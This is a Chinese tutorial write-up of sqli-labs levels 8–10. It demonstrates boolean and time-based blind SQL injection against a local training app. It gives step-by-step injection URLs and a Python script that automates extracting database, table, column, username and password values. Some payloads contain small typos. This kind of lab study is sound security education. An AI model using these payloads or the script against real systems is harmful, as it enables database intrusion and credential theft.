当前位置：首页 > news >正文

sqli-lab靶场学习（三）——Less8-10（盲注、时间盲注）

news 2025/12/14 0:55:37

Less8

第八关依然是先看一般状态

http://localhost/sqli-labs/Less-8/?id=1

然后用单引号闭合：

http://localhost/sqli-labs/Less-8/?id=1'

这关的问题在于报错是不显示，那没办法通过上篇文章的updatexml大法处理。对于这种情况，需要用“盲注”，说白了就是猜，例如如下：

http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd

这里猜数据库第一个字幕是s，当然我们不是神，肯定不可能一猜就猜中。一般来说就得一个一个猜。当然我们可以利用二分查找的思路，通过大于小于的方式，确定并逐步缩小区间，这样可以减少查询的次数。

我们通过这样的方式，可以顺利查出所属数据库，另外还得先查字符串的长度，确定了长度再一个一个字符盲注尝试：

http://localhost/sqli-labs/Less-8/?id=1' and LENGTH(DATABASE())=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 2, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 3, 1)='c' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 4, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 5, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 6, 1)='i' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 7, 1)='t' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 8, 1)='y' -- asd

一通操作下来，逐个字符对比，就能试出是security这个。同样的方法，可以找出在information_schema.tables中第四个表的表名是users：

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s' -- asd

这里都是忽略了一个一个表，一个一个字符尝试的过程。

之后用同样的方式，盲注找出列名：

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e' -- asdhttp://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d' -- asd

盲注后匹配第四和第五个列名是username和password。

之后盲注找出用户名和密码：

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(username) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 4, 1))=98 -- asdhttp://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(password) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 4, 1))=98 -- asd

这里用了ascii码来匹配，因为账号密码是有大小写区分，但mysql默认配置里是不区分大小写。前面数据库名、表名、列名也可以用ascii码去匹配。如果数据库本身是区分大小写的话就一定要用ascii码来匹配。

Less9

第九关难度更大了，会发现无论输入什么闭合，页面返回都一样。这代表这个页面是无论对错，返回的东西都一样。那这种情况怎么办？这里要用到“时间盲注”。时间盲注具体的做法是，如果注入判断条件正确，则sleep一段时间，如果错误就立即返回。这样通过看请求是否sleep就能判断之前的条件是否正确。而注入条件则是第八关的内容。

举个例子当我们输入：

http://localhost/sqli-labs/Less-9/?id=1' and if(1=1,sleep(2),1)  -- asd

浏览器左上角会转圈圈大概2秒，通过浏览器开发者工具f12

看到等待了2秒服务器才返回。这就是时间盲注。

所以可以利用同样的语句找出数据库名：

http://localhost/sqli-labs/Less-9/?id=1' and if(LENGTH(DATABASE())=8, sleep(2), 1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 1, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 2, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 3, 1)='c', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 4, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 5, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 6, 1)='i', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 7, 1)='t', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 8, 1)='y', sleep(2),1) -- asd

找出表名：

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s', sleep(2),1) -- asd

找出列名：

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e', sleep(2),1) -- asdhttp://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d', sleep(2),1) -- asd

最后找出账号名密码：

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(username) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 4, 1))=98, sleep(2),1) -- asdhttp://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(passowrd) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd

除了添加了if条件和sleep之外，基本和第八关一致，效果就不另外展示了。

时间盲注脚本

一个一个手动试，除非本身知道答案，否则太费劲了，所以可以用python脚本处理

import requests
import timedb_ascii = [48,49,50,51,52,53,54,55,56,57,58,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122]def get_method(url_params):t1 = time.time()#print(url_params)r = requests.get('http://localhost/sqli-labs/Less-8', params=url_params)t2 = time.time()if t2-t1 > 2:return Truereturn Falsedef check_database():##数据库名长度database_len = 0for i in range(100):params = {'id': "1' and if(LENGTH(DATABASE())=" + str(i) + ", sleep(2), 1) -- asd"}if get_method(params):database_len = iprint('database name length is: ' + str(database_len))breakfor j in range(database_len):for db_char in db_ascii:params = {'id': "1' and if(ASCII(substr(database(), " + str(j + 1) + ", 1))=" + str(db_char) + ", sleep(2),1) -- asd"}if get_method(params):print(chr(db_char), end='')breaktime.sleep(0.05)print('')def check_table():##表数table_num = 0for i in range(100):num_params = {'id': "1' and if((select count(1) from information_schema.tables where table_schema=database())=" +str(i) + ", sleep(2),1) -- asd"}if get_method(num_params):table_num = iprint('table number  is: ' + str(table_num))breakfor k in range(table_num):##表名长度table_name_len = 0for l in range(100):tb_len_params = {'id': "1' and if((select LENGTH(table_name) from information_schema.tables where " +"table_schema=database() limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}if get_method(tb_len_params):table_name_len = lprint('table name length is: ' + str(table_name_len))break##表名for j in range(table_name_len):for tb_char in db_ascii:tb_name_params = {'id': "1' and if(ASCII(substr((select table_name from information_schema.tables " +"where table_schema=database() limit " + str(k) + ",1), " + str(j+1) + ", 1))=" + str(tb_char) + ", " +"sleep(2),1) -- asd"}if get_method(tb_name_params):print(chr(tb_char), end='')breaktime.sleep(0.05)print('')def check_column(tb_name):##列数col_num = 0for i in range(100):num_params = {'id': "1' and if((select count(1) from information_schema.columns where table_name='" + tb_name + "')=" +str(i) + ", sleep(2),1) -- asd"}if get_method(num_params):col_num = iprint('column number  is: ' + str(col_num))breakfor k in range(col_num):##列名长度col_name_len = 0for l in range(100):col_len_params = {'id': "1' and if((select LENGTH(column_name) from information_schema.columns where " +"table_name='" + tb_name + "' limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}if get_method(col_len_params):col_name_len = lprint('column name length is: ' + str(col_name_len))break##列名for j in range(col_name_len):for col_char in db_ascii:col_name_params = {'id': "1' and if(ASCII(substr((select column_name from information_schema.columns " +"where table_name='" + tb_name + "' limit " + str(k) + ",1), " + str(j + 1) + ", 1))=" +str(col_char) + ", sleep(2),1) -- asd"}if get_method(col_name_params):print(chr(col_char), end='')breaktime.sleep(0.05)print('')def check_username_password(tb_name, username_col, password_col, start, end):for i in range(start, end):#用户名长度username_len = 0for j in range(100):username_len_params = {'id': "1' and if((select LENGTH(" + username_col + ") from " + tb_name +" limit " + str(i) + ", 1)=" + str(j) + ", sleep(2),1) -- asd"}if get_method(username_len_params):username_len = jprint('username length is: ' + str(j))breakfor k in range(username_len):for username_char in range(33,127):username_params = {'id': "1' and if(ASCII(substr((select " + username_col + " from " + tb_name +" limit " + str(i) + ",1), " + str(k+1) + ", 1))=" + str(username_char) +", sleep(2),1) -- asd"}if get_method(username_params):print(chr(username_char), end='')breaktime.sleep(0.05)print('')# 密码长度password_len = 0for l in range(100):password_len_params = {'id': "1' and if((select LENGTH(" + password_col + ") from " + tb_name +" limit " + str(i) + ", 1)=" + str(l) + ", sleep(2),1) -- asd"}if get_method(password_len_params):password_len = lprint('password length is: ' + str(l))breakfor m in range(password_len):for password_char in range(33,127):password_params = {'id': "1' and if(ASCII(substr((select " + password_col + " from " + tb_name +" limit " + str(i) + ",1), " + str(m+1) + ", 1))=" + str(password_char) +", sleep(2),1) -- asd"}if get_method(password_params):print(chr(password_char), end='')breaktime.sleep(0.05)print('')if __name__ == '__main__':check_database()check_table()#check_column('users')#check_username_password('users', 'username', 'password', 0, 2)

写了一个穷举式的，读者感兴趣可以写个二分查找会更快。其中查列名和用户名密码的函数需要在前面的函数中获取到表名和列名，才能作为传参。

Less10

第十关和第九关除了闭合区间变成双引号外，其余一致，就不另外写了。

sqli-lab靶场学习（三）——Less8-10（盲注、时间盲注）

Less8

Less9

时间盲注脚本

Less10

相关文章：

sqli-lab靶场学习（三）——Less8-10（盲注、时间盲注）

Pybullet 安装过程

Error when custom data is added to Azure OpenAI Service Deployment

libreoffice word转pdf

java -----泛型

Springboot 文件上传下载相关问题

【Kotlin 与 Java 互操作】Java中调用带有默认值的Kotlin函数(十四)

点赞系统实现

c++进阶学习-----继承

C++学习笔记（37）

Redis发布和订阅

计算机毕设设计推荐-基于python+Djanog大数据的电影数据可视化分析

dhtmlxGantt 甘特图一行展示多条任务类型

COLORmap

手机在网状态查询接口如何用Java进行调用？

mysql性能优化- 数据库配置优化

(算法)大数的进制转换

演示jvm锁存在的问题

Android SharedPreference详解

论文阅读 | 可证安全隐写（网络空间安全科学学报 2023）

JavaSec-RCE

大数据学习栈记——Neo4j的安装与使用

SciencePlots——绘制论文中的图片

【HarmonyOS 5.0】DevEco Testing：鸿蒙应用质量保障的终极武器

Python爬虫（二）：爬虫完整流程

Java-41 深入浅出 Spring - 声明式事务的支持事务配置 XML模式 XML+注解模式

Python爬虫（一）：爬虫伪装

LLM基础1_语言模型如何处理文本

【C++从零实现Json-Rpc框架】第六弹 —— 服务端模块划分

Linux --进程控制